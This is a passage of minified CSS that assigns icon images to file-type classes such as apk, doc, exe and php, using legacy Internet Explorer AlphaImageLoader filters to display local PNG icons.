\9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/apk.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/apk.png?ver=3.30',sizingMethod='scale');}.x-as{background-image:url("../../../images/file_icon/icon_file/as.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/as.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/as.png?ver=3.30',sizingMethod='scale');}.x-ascx{background-image:url("../../../images/file_icon/icon_file/ascx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ascx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ascx.png?ver=3.30',sizingMethod='scale');}.x-ashx{background-image:url("../../../images/file_icon/icon_file/ashx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ashx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ashx.png?ver=3.30',sizingMethod='scale');}.x-asmx{background-image:url("../../../images/file_icon/icon_file/asmx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/asmx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/asmx.png?ver=3.30',sizingMethod='scale');}.x-aspx{background-image:url("../../../images/file_icon/icon_file/aspx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/aspx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/aspx.png?ver=3.30',sizingMethod='scale');}.x-bz2{background-image:url("../../../images/file_icon/icon_file/bz2.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bz2.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/bz2.png?ver=3.30',sizingMethod='scale');}.x-cdr{background-image:url("../../../images/file_icon/icon_file/cdr.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cdr.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cdr.png?ver=3.30',sizingMethod='scale');}.x-cer{background-image:url("../../../images/file_icon/icon_file/cer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cer.png?ver=3.30',sizingMethod='scale');}.x-chm{background-image:url("../../../images/file_icon/icon_file/chm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/chm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/chm.png?ver=3.30',sizingMethod='scale');}.x-cmd{background-image:url("../../../images/file_icon/icon_file/cmd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cmd.png?ver=3.30',sizingMethod='scale');}.x-c{background-image:url("../../../images/file_icon/icon_file/c.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/c.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/c.png?ver=3.30',sizingMethod='scale');}.x-cpp{background-image:url("../../../images/file_icon/icon_file/cpp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cpp.png?ver=3.30',sizingMethod='scale');}.x-cs{background-image:url("../../../images/file_icon/icon_file/cs.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cs.png?ver=3.30',sizingMethod='scale');}.x-cshtml{background-image:url("../../../images/file_icon/icon_file/cshtml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cshtml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/cshtml.png?ver=3.30',sizingMethod='scale');}.x-csproj{background-image:url("../../../images/file_icon/icon_file/csproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csproj.png?ver=3.30',sizingMethod='scale');}.x-css{background-image:url("../../../images/file_icon/icon_file/css.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/css.png?ver=3.30',sizingMethod='scale');}.x-csv{background-image:url("../../../images/file_icon/icon_file/csv.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csv.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/csv.png?ver=3.30',sizingMethod='scale');}.x-djvu{background-image:url("../../../images/file_icon/icon_file/djvu.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/djvu.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/djvu.png?ver=3.30',sizingMethod='scale');}.x-dll{background-image:url("../../../images/file_icon/icon_file/dll.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dll.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dll.png?ver=3.30',sizingMethod='scale');}.x-dng{background-image:url("../../../images/file_icon/icon_file/dng.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dng.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dng.png?ver=3.30',sizingMethod='scale');}.x-dmg,.x-img{background-image:url("../../../images/file_icon/icon_file/dmg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dmg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dmg.png?ver=3.30',sizingMethod='scale');}.x-doc,.x-wps{background-image:url("../../../images/file_icon/icon_file/doc.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/doc.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/doc.png?ver=3.30',sizingMethod='scale');}.x-docm{background-image:url("../../../images/file_icon/icon_file/docm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docm.png?ver=3.30',sizingMethod='scale');}.x-docx{background-image:url("../../../images/file_icon/icon_file/docx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/docx.png?ver=3.30',sizingMethod='scale');}.x-dot{background-image:url("../../../images/file_icon/icon_file/dot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dot.png?ver=3.30',sizingMethod='scale');}.x-dotm{background-image:url("../../../images/file_icon/icon_file/dotm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotm.png?ver=3.30',sizingMethod='scale');}.x-dotx{background-image:url("../../../images/file_icon/icon_file/dotx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dotx.png?ver=3.30',sizingMethod='scale');}.x-dtd{background-image:url("../../../images/file_icon/icon_file/dtd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dtd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/dtd.png?ver=3.30',sizingMethod='scale');}.x-eps{background-image:url("../../../images/file_icon/icon_file/eps.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/eps.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/eps.png?ver=3.30',sizingMethod='scale');}.x-epub{background-image:url("../../../images/file_icon/icon_file/epub.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/epub.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/epub.png?ver=3.30',sizingMethod='scale');}.x-exe{background-image:url("../../../images/file_icon/icon_file/exe.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/exe.png?ver=3.30',sizingMethod='scale');}.x-f{background-image:url("../../../images/file_icon/icon_file/f.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/f.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/f.png?ver=3.30',sizingMethod='scale');}.x-file{background-image:url("../../../images/file_icon/icon_file/file.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/file.png?ver=3.30',sizingMethod='scale');}.x-fla{background-image:url("../../../images/file_icon/icon_file/fla.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/fla.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/fla.png?ver=3.30',sizingMethod='scale');}.x-font{background-image:url("../../../images/file_icon/icon_file/font.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/font.png?ver=3.30',sizingMethod='scale');}.x-gif{background-image:url("../../../images/file_icon/icon_file/gif.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gif.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gif.png?ver=3.30',sizingMethod='scale');}.x-gz{background-image:url("../../../images/file_icon/icon_file/gz.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gz.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/gz.png?ver=3.30',sizingMethod='scale');}.x-h{background-image:url("../../../images/file_icon/icon_file/h.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/h.png?ver=3.30',sizingMethod='scale');}.x-hdr{background-image:url("../../../images/file_icon/icon_file/hdr.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hdr.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hdr.png?ver=3.30',sizingMethod='scale');}.x-hlp{background-image:url("../../../images/file_icon/icon_file/hlp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hlp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/hlp.png?ver=3.30',sizingMethod='scale');}.x-html{background-image:url("../../../images/file_icon/icon_file/html.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/html.png?ver=3.30',sizingMethod='scale');}.x-indd{background-image:url("../../../images/file_icon/icon_file/indd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/indd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/indd.png?ver=3.30',sizingMethod='scale');}.x-ini{background-image:url("../../../images/file_icon/icon_file/ini.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ini.png?ver=3.30',sizingMethod='scale');}.x-ipa{background-image:url("../../../images/file_icon/icon_file/ipa.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ipa.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ipa.png?ver=3.30',sizingMethod='scale');}.x-jar{background-image:url("../../../images/file_icon/icon_file/jar.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jar.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jar.png?ver=3.30',sizingMethod='scale');}.x-java{background-image:url("../../../images/file_icon/icon_file/java.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/java.png?ver=3.30',sizingMethod='scale');}.x-jpg{background-image:url("../../../images/file_icon/icon_file/jpg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/jpg.png?ver=3.30',sizingMethod='scale');}.x-js{background-image:url("../../../images/file_icon/icon_file/js.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/js.png?ver=3.30',sizingMethod='scale');}.x-json{background-image:url("../../../images/file_icon/icon_file/json.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/json.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/json.png?ver=3.30',sizingMethod='scale');}.x-key{background-image:url("../../../images/file_icon/icon_file/key.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/key.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/key.png?ver=3.30',sizingMethod='scale');}.x-ldf{background-image:url("../../../images/file_icon/icon_file/ldf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ldf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ldf.png?ver=3.30',sizingMethod='scale');}.x-lnk{background-image:url("../../../images/file_icon/icon_file/lnk.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/lnk.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/lnk.png?ver=3.30',sizingMethod='scale');}.x-makefile{background-image:url("../../../images/file_icon/icon_file/makefile.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/makefile.png?ver=3.30',sizingMethod='scale');}.x-mdb{background-image:url("../../../images/file_icon/icon_file/mdb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdb.png?ver=3.30',sizingMethod='scale');}.x-mdf{background-image:url("../../../images/file_icon/icon_file/mdf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mdf.png?ver=3.30',sizingMethod='scale');}.x-mht{background-image:url("../../../images/file_icon/icon_file/mht.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mht.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mht.png?ver=3.30',sizingMethod='scale');}.x-midi{background-image:url("../../../images/file_icon/icon_file/midi.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/midi.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/midi.png?ver=3.30',sizingMethod='scale');}.x-mpp{background-image:url("../../../images/file_icon/icon_file/mpp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpp.png?ver=3.30',sizingMethod='scale');}.x-mpt{background-image:url("../../../images/file_icon/icon_file/mpt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/mpt.png?ver=3.30',sizingMethod='scale');}.x-msg{background-image:url("../../../images/file_icon/icon_file/msg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msg.png?ver=3.30',sizingMethod='scale');}.x-msi{background-image:url("../../../images/file_icon/icon_file/msi.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msi.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/msi.png?ver=3.30',sizingMethod='scale');}.x-numbers{background-image:url("../../../images/file_icon/icon_file/numbers.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/numbers.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/numbers.png?ver=3.30',sizingMethod='scale');}.x-odp{background-image:url("../../../images/file_icon/icon_file/odp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odp.png?ver=3.30',sizingMethod='scale');}.x-ods{background-image:url("../../../images/file_icon/icon_file/ods.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ods.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ods.png?ver=3.30',sizingMethod='scale');}.x-odt{background-image:url("../../../images/file_icon/icon_file/odt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/odt.png?ver=3.30',sizingMethod='scale');}.x-oexe{background-image:url("../../../images/file_icon/icon_file/oexe.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe.png?ver=3.30',sizingMethod='scale');}.x-oexe2{background-image:url("../../../images/file_icon/icon_file/oexe2.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe2.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/oexe2.png?ver=3.30',sizingMethod='scale');}.x-ogg{background-image:url("../../../images/file_icon/icon_file/ogg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ogg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ogg.png?ver=3.30',sizingMethod='scale');}.x-pages{background-image:url("../../../images/file_icon/icon_file/pages.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pages.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pages.png?ver=3.30',sizingMethod='scale');}.x-pdb{background-image:url("../../../images/file_icon/icon_file/pdb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdb.png?ver=3.30',sizingMethod='scale');}.x-pdf{background-image:url("../../../images/file_icon/icon_file/pdf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pdf.png?ver=3.30',sizingMethod='scale');}.x-php{background-image:url("../../../images/file_icon/icon_file/php.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php.png?ver=3.30',sizingMethod='scale');}.x-pkg{background-image:url("../../../images/file_icon/icon_file/pkg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');}.x-pl{background-image:url("../../../images/file_icon/icon_file/pl.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pl.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pl.png?ver=3.30',sizingMethod='scale');}.x-png{background-image:url("../../../images/file_icon/icon_file/png.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/png.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/png.png?ver=3.30',sizingMethod='scale');}.x-pps{background-image:url("../../../images/file_icon/icon_file/pps.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pps.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pps.png?ver=3.30',sizingMethod='scale');}.x-ppsx{background-image:url("../../../images/file_icon/icon_file/ppsx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppsx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppsx.png?ver=3.30',sizingMethod='scale');}.x-ppt{background-image:url("../../../images/file_icon/icon_file/ppt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppt.png?ver=3.30',sizingMethod='scale');}.x-pptx{background-image:url("../../../images/file_icon/icon_file/pptx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pptx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pptx.png?ver=3.30',sizingMethod='scale');}.x-pot{background-image:url("../../../images/file_icon/icon_file/pot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pot.png?ver=3.30',sizingMethod='scale');}.x-potx,.x-ppam{background-image:url("../../../images/file_icon/icon_file/potx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/potx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/potx.png?ver=3.30',sizingMethod='scale');}.x-prproj{background-image:url("../../../images/file_icon/icon_file/prproj.png");background-image:none 